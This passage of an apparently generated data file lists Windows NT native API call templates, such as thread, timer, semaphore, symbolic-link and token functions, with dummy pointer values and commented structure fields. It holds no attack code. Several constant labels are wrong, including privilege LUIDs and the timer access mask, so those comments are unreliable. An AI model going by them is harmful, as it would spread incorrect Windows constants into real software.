SEMAPHORE_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to HANDLE SemaphoreHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct218": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd00a0", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer for named semaphore)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtQuerySemaphore": { "ntFunc": "NtQuerySemaphore", "pushes": [ { "value": "0xbadd0040", "additionalComment": "Pointer to ULONG ReturnLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000010" }, { "value": "0x00000010", "additionalComment": "ULONG SemaphoreInformationLength (example: 16 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to buffer for SemaphoreInformation (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000000", "additionalComment": "SEMAPHORE_INFORMATION_CLASS SemaphoreBasicInformation", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE SemaphoreHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtReleaseSemaphore": { "ntFunc": "NtReleaseSemaphore", "pushes": [ { "value": "0xbadd0060", "additionalComment": "Pointer to ULONG PreviousCount (dummy pointer, can be None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0x00000001", "additionalComment": "ULONG ReleaseCount (example: 1)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE SemaphoreHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCreateSymbolicLinkObject": { "ntFunc": "NtCreateSymbolicLinkObject", "pushes": [ { "value": "0xbadd0070", "additionalComment": "Pointer to UNICODE_STRING DestinationName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct219", "structureValueExpectations": "UNICODE_STRING structure describing the symbolic link target name.", "pointedValue": None }, { "value": "0xbadd0080", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct220", "structureValueExpectations": "Length/size field; optional root directory handle; pointer to UNICODE_STRING object name; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x000F0001", "additionalComment": "ACCESS_MASK DesiredAccess (example: SYMBOLIC_LINK_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0090", "additionalComment": "Pointer to HANDLE pHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct219": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0014", "fieldComment": "Length in bytes (example: 20 bytes for 10 WCHARs)" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Maximum length in bytes (example: 32 bytes)" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd00b0", "fieldComment": "Pointer to wide string buffer (dummy pointer)" } ] }, "struct220": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd00c0", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer for symbolic link name)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtOpenSymbolicLinkObject": { "ntFunc": "NtOpenSymbolicLinkObject", "pushes": [ { "value": "0x00000000", "additionalComment": "None (no OBJECT_ATTRIBUTES, open by name not provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00020019", "additionalComment": "SYMBOLIC_LINK_QUERY | STANDARD_RIGHTS_READ (realistic DesiredAccess)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to HANDLE SymbolicLinkHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtQuerySymbolicLinkObject": { "ntFunc": "NtQuerySymbolicLinkObject", "pushes": [ { "value": "0xbadd0010", "additionalComment": "Pointer to ULONG DataWritten (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000010" }, { "value": "0xbadd0020", "additionalComment": "Pointer to UNICODE_STRING LinkTarget (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct221", "structureValueExpectations": "UNICODE_STRING buffer for the symbolic link target.", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE SymbolicLinkHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct221": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "Length in bytes of the string" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Maximum buffer size in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0090", "fieldComment": "Pointer to buffer (dummy pointer)" } ] } } }, "NtAlertResumeThread": { "ntFunc": "NtAlertResumeThread", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to ULONG SuspendCount (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0x00005555", "additionalComment": "HANDLE ThreadHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtContinue": { "ntFunc": "NtContinue", "pushes": [ { "value": "0x00000000", "additionalComment": "FALSE (do not raise alert)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to CONTEXT structure (dummy pointer)", "structurePointer": "CONTEXT", "structureRef": "struct222", "structureValueExpectations": "Thread context structure with register state.", "pointedValue": None } ], "structures": { "struct222": { "type": "CONTEXT", "fields": [ { "fieldName": "ContextFlags", "fieldType": "DWORD", "fieldValue": "0x00010007", "fieldComment": "CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS" }, { "fieldName": "Eip", "fieldType": "DWORD", "fieldValue": "0x00401000", "fieldComment": "Instruction pointer" }, { "fieldName": "Esp", "fieldType": "DWORD", "fieldValue": "0x0012FFB0", "fieldComment": "Stack pointer" } ] } } }, "NtCreateThread": { "ntFunc": "NtCreateThread", "pushes": [ { "value": "0x00000001", "additionalComment": "TRUE (create suspended)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to INITIAL_TEB (dummy pointer)", "structurePointer": "INITIAL_TEB", "structureRef": "struct223", "structureValueExpectations": "Stack base/limit and TEB allocation info.", "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to CONTEXT (dummy pointer)", "structurePointer": "CONTEXT", "structureRef": "struct224", "structureValueExpectations": "Initial thread context (registers, etc).", "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to CLIENT_ID (dummy pointer)", "structurePointer": "CLIENT_ID", "structureRef": "struct225", "structureValueExpectations": "UniqueProcess and UniqueThread identifiers.", "pointedValue": None }, { "value": "0x00004444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None (no OBJECT_ATTRIBUTES, default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x001F03FF", "additionalComment": "THREAD_ALL_ACCESS (realistic DesiredAccess)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0080", "additionalComment": "Pointer to HANDLE ThreadHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct223": { "type": "INITIAL_TEB", "fields": [ { "fieldName": "StackBase", "fieldType": "PVOID", "fieldValue": "0x0012F000", "fieldComment": "Top of stack" }, { "fieldName": "StackLimit", "fieldType": "PVOID", "fieldValue": "0x0012C000", "fieldComment": "Bottom of stack" }, { "fieldName": "StackCommit", "fieldType": "PVOID", "fieldValue": "0x0012D000", "fieldComment": "Committed stack" } ] }, "struct224": { "type": "CONTEXT", "fields": [ { "fieldName": "ContextFlags", "fieldType": "DWORD", "fieldValue": "0x00010007", "fieldComment": "CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS" }, { "fieldName": "Eip", "fieldType": "DWORD", "fieldValue": "0x00402000", "fieldComment": "Instruction pointer" }, { "fieldName": "Esp", "fieldType": "DWORD", "fieldValue": "0x0012FFA0", "fieldComment": "Stack pointer" } ] }, "struct225": { "type": "CLIENT_ID", "fields": [ { "fieldName": "UniqueProcess", "fieldType": "HANDLE", "fieldValue": "0x99995555", "fieldComment": "Dummy process identifier value" }, { "fieldName": "UniqueThread", "fieldType": "HANDLE", "fieldValue": "0x00006666", "fieldComment": "Dummy thread identifier value" } ] } } }, "NtDelayExecution": { "ntFunc": "NtDelayExecution", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to LARGE_INTEGER DelayInterval (dummy pointer, commonly negative for relative delay)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct226", "structureValueExpectations": "Negative value for relative delay in 100-nanosecond intervals.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Alertable = FALSE (wait is not alertable)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct226": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0xFFFFFFFFFFDCD650", "fieldComment": "Relative delay of -2,000,000 (200ms) in 100-nanosecond units" } ] } } }, "NtImpersonateThread": { "ntFunc": "NtImpersonateThread", "pushes": [ { "value": "0xbadd0010", "additionalComment": "Pointer to SECURITY_QUALITY_OF_SERVICE (dummy pointer)", "structurePointer": "SECURITY_QUALITY_OF_SERVICE", "structureRef": "struct227", "structureValueExpectations": "Impersonation level, context tracking, effective only.", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ThreadToImpersonate (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000333", "additionalComment": "HANDLE ThreadHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct227": { "type": "SECURITY_QUALITY_OF_SERVICE", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x0000000C", "fieldComment": "Size of SECURITY_QUALITY_OF_SERVICE" }, { "fieldName": "ImpersonationLevel", "fieldType": "SECURITY_IMPERSONATION_LEVEL", "fieldValue": "0x00000002", "fieldComment": "SecurityImpersonation" }, { "fieldName": "ContextTrackingMode", "fieldType": "BOOLEAN", "fieldValue": "0x01", "fieldComment": "TRUE" }, { "fieldName": "EffectiveOnly", "fieldType": "BOOLEAN", "fieldValue": "0x00", "fieldComment": "FALSE" } ] } } }, "NtOpenThread": { "ntFunc": "NtOpenThread", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to CLIENT_ID (dummy pointer)", "structurePointer": "CLIENT_ID", "structureRef": "struct228", "structureValueExpectations": "UniqueProcess and UniqueThread identifiers.", "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct229", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x001F03FF", "additionalComment": "AccessMask (THREAD_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to HANDLE ThreadHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct228": { "type": "CLIENT_ID", "fields": [ { "fieldName": "UniqueProcess", "fieldType": "HANDLE", "fieldValue": "0x99995555", "fieldComment": "Dummy process identifier value" }, { "fieldName": "UniqueThread", "fieldType": "HANDLE", "fieldValue": "0x88887777", "fieldComment": "Dummy thread identifier value" } ] }, "struct229": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None (no object name)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtQueryInformationThread": { "ntFunc": "NtQueryInformationThread", "pushes": [ { "value": "0xbadd0050", "additionalComment": "Pointer to ULONG ReturnLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000010" }, { "value": "0x00000010", "additionalComment": "ThreadInformationLength (16 bytes, typical for THREAD_BASIC_INFORMATION)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to THREAD_BASIC_INFORMATION (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": "Buffer for thread information structure.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ThreadInformationClass (ThreadBasicInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000333", "additionalComment": "HANDLE ThreadHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtRegisterThreadTerminatePort": { "ntFunc": "NtRegisterThreadTerminatePort", "pushes": [ { "value": "0x00000000", "additionalComment": "HANDLE PortHandle (None, no port registered)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtResumeThread": { "ntFunc": "NtResumeThread", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG SuspendCount (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0x00004444", "additionalComment": "HANDLE ThreadHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetInformationThread": { "ntFunc": "NtSetInformationThread", "pushes": [ { "value": "0x00000008", "additionalComment": "ULONG ThreadInformationLength (example: 8 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "PVOID ThreadInformation (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000002" }, { "value": "0x00000009", "additionalComment": "THREADINFOCLASS ThreadInformationClass (ThreadPriority)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00004444", "additionalComment": "HANDLE ThreadHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSuspendThread": { "ntFunc": "NtSuspendThread", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to ULONG PreviousSuspendCount (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00004444", "additionalComment": "HANDLE ThreadHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtTerminateThread": { "ntFunc": "NtTerminateThread", "pushes": [ { "value": "0xC0000005", "additionalComment": "NTSTATUS ExitStatus (STATUS_ACCESS_VIOLATION example)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00004444", "additionalComment": "HANDLE ThreadHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtYieldExecution": { "ntFunc": "NtYieldExecution", "pushes": [], "structures": {} }, "RtlCreateUserThread": { "ntFunc": "RtlCreateUserThread", "pushes": [ { "value": "0x00000000", "additionalComment": "PCLIENT_ID ClientID (None, optional parameter)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PHANDLE ThreadHandle (None, output parameter)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID StartParameter (None, no parameter passed to thread start routine)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID StartAddress (None, invalid, but often set to a function pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PULONG StackCommit (None, use default stack commit size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PULONG StackReserved (None, use default stack reserve size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG StackZeroBits (0, use default stack zero bits)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "BOOLEAN CreateSuspended (FALSE, thread starts immediately)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PSECURITY_DESCRIPTOR SecurityDescriptor (None, default security)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HANDLE ProcessHandle (None, invalid, should be a valid process handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCancelTimer": { "ntFunc": "NtCancelTimer", "pushes": [ { "value": "0x00000000", "additionalComment": "PBOOLEAN CurrentState (None, optional output parameter)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HANDLE TimerHandle (None, invalid, should be a valid timer handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCreateTimer": { "ntFunc": "NtCreateTimer", "pushes": [ { "value": "0x00000000", "additionalComment": "TIMER_TYPE TimerType (NotificationTimer, default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "POBJECT_ATTRIBUTES ObjectAttributes (None, unnamed timer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00100000", "additionalComment": "ACCESS_MASK DesiredAccess (TIMER_ALL_ACCESS, sample value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "PHANDLE TimerHandle (dummy pointer, output parameter)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtOpenTimer": { "ntFunc": "NtOpenTimer", "pushes": [ { "value": "0x00000000", "additionalComment": "POBJECT_ATTRIBUTES ObjectAttributes (None, unnamed timer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00100000", "additionalComment": "ACCESS_MASK DesiredAccess (TIMER_ALL_ACCESS, sample value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0080", "additionalComment": "PHANDLE TimerHandle (dummy pointer, output parameter)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtQueryTimer": { "ntFunc": "NtQueryTimer", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG ReturnLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000020" }, { "value": "0x00000018", "additionalComment": "TimerInformationLength (24 bytes, typical for TIMER_BASIC_INFORMATION)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to TIMER_BASIC_INFORMATION structure (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "TimerInformationClass (TimerBasicInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE TimerHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetTimer": { "ntFunc": "NtSetTimer", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to BOOLEAN PreviousState (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00" }, { "value": "0x000003E8", "additionalComment": "Period (1000 ms, 1 second)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "ResumeTimer (TRUE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "TimerContext (None, no context pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "TimerApcRoutine (None, no APC routine)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to LARGE_INTEGER DueTime (dummy pointer)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct230", "structureValueExpectations": "Relative or absolute time in 100-nanosecond intervals.", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE TimerHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct230": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0xfffff5e100000000", "fieldComment": "Relative time: -1 hour in 100-nanosecond intervals" } ] } } }, "NtAdjustGroupsToken": { "ntFunc": "NtAdjustGroupsToken", "pushes": [ { "value": "0xbadd0040", "additionalComment": "Pointer to ULONG RequiredLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000030" }, { "value": "0xbadd0050", "additionalComment": "Pointer to TOKEN_GROUPS PreviousGroups (dummy pointer)", "structurePointer": "TOKEN_GROUPS", "structureRef": "struct231", "structureValueExpectations": "Previous group membership information.", "pointedValue": None }, { "value": "0x00000030", "additionalComment": "PreviousGroupsLength (48 bytes, enough for 2 groups)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to TOKEN_GROUPS TokenGroups (dummy pointer)", "structurePointer": "TOKEN_GROUPS", "structureRef": "struct232", "structureValueExpectations": "New group membership information.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ResetToDefault (FALSE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE TokenHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct231": { "type": "TOKEN_GROUPS", "fields": [ { "fieldName": "GroupCount", "fieldType": "ULONG", "fieldValue": "0x00000002", "fieldComment": "Two groups" }, { "fieldName": "Groups[0].Sid", "fieldType": "PSID", "fieldValue": "0xbadd0150", "fieldComment": "Pointer to SID (dummy pointer)" }, { "fieldName": "Groups[0].Attributes", "fieldType": "ULONG", "fieldValue": "0x00000020", "fieldComment": "SE_GROUP_ENABLED" }, { "fieldName": "Groups[1].Sid", "fieldType": "PSID", "fieldValue": "0xbadd0160", "fieldComment": "Pointer to SID (dummy pointer)" }, { "fieldName": "Groups[1].Attributes", "fieldType": "ULONG", "fieldValue": "0x00000010", "fieldComment": "SE_GROUP_OWNER" } ] }, "struct232": { "type": "TOKEN_GROUPS", "fields": [ { "fieldName": "GroupCount", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "One group" }, { "fieldName": "Groups[0].Sid", "fieldType": "PSID", "fieldValue": "0xbadd0170", "fieldComment": "Pointer to SID (dummy pointer)" }, { "fieldName": "Groups[0].Attributes", "fieldType": "ULONG", "fieldValue": "0x00000020", "fieldComment": "SE_GROUP_ENABLED" } ] } } }, "NtAdjustPrivilegesToken": { "ntFunc": "NtAdjustPrivilegesToken", "pushes": [ { "value": "0xbadd0070", "additionalComment": "Pointer to ULONG RequiredLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000018" }, { "value": "0xbadd0080", "additionalComment": "Pointer to TOKEN_PRIVILEGES PreviousPrivileges (dummy pointer)", "structurePointer": "TOKEN_PRIVILEGES", "structureRef": "struct233", "structureValueExpectations": "Previous privilege state information.", "pointedValue": None }, { "value": "0x00000018", "additionalComment": "PreviousPrivilegesLength (24 bytes, enough for 1 privilege)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0090", "additionalComment": "Pointer to TOKEN_PRIVILEGES TokenPrivileges (dummy pointer)", "structurePointer": "TOKEN_PRIVILEGES", "structureRef": "struct234", "structureValueExpectations": "Privileges to adjust.", "pointedValue": None }, { "value": "0x00000001", "additionalComment": "DisableAllPrivileges (TRUE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE TokenHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct233": { "type": "TOKEN_PRIVILEGES", "fields": [ { "fieldName": "PrivilegeCount", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "One privilege" }, { "fieldName": "Privileges[0].Luid.LowPart", "fieldType": "ULONG", "fieldValue": "0x00000017", "fieldComment": "SE_SHUTDOWN_PRIVILEGE" }, { "fieldName": "Privileges[0].Luid.HighPart", "fieldType": "LONG", "fieldValue": "0x00000000", "fieldComment": "High part" }, { "fieldName": "Privileges[0].Attributes", "fieldType": "ULONG", "fieldValue": "0x00000002", "fieldComment": "SE_PRIVILEGE_ENABLED" } ] }, "struct234": { "type": "TOKEN_PRIVILEGES", "fields": [ { "fieldName": "PrivilegeCount", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "One privilege" }, { "fieldName": "Privileges[0].Luid.LowPart", "fieldType": "ULONG", "fieldValue": "0x00000012", "fieldComment": "SE_TCB_PRIVILEGE" }, { "fieldName": "Privileges[0].Luid.HighPart", "fieldType": "LONG", "fieldValue": "0x00000000", "fieldComment": "High part" }, { "fieldName": "Privileges[0].Attributes", "fieldType": "ULONG", "fieldValue": "0x00000002", "fieldComment": "SE_PRIVILEGE_ENABLED" } ] } } }, "NtCreateToken": { "ntFunc": "NtCreateToken", "pushes": [ { "value": "0xbadd00a0", "additionalComment": "Pointer to TOKEN_SOURCE (dummy pointer)", "structurePointer": "TOKEN_SOURCE", "structureRef": "struct235", "structureValueExpectations": "Source name and identifier.", "pointedValue": None }, { "value": "0xbadd00b0", "additionalComment": "Pointer to TOKEN_DEFAULT_DACL (dummy pointer)", "structurePointer": "TOKEN_DEFAULT_DACL", "structureRef": "struct236", "structureValueExpectations": "Default DACL for the token.", "pointedValue": None }, { "value": 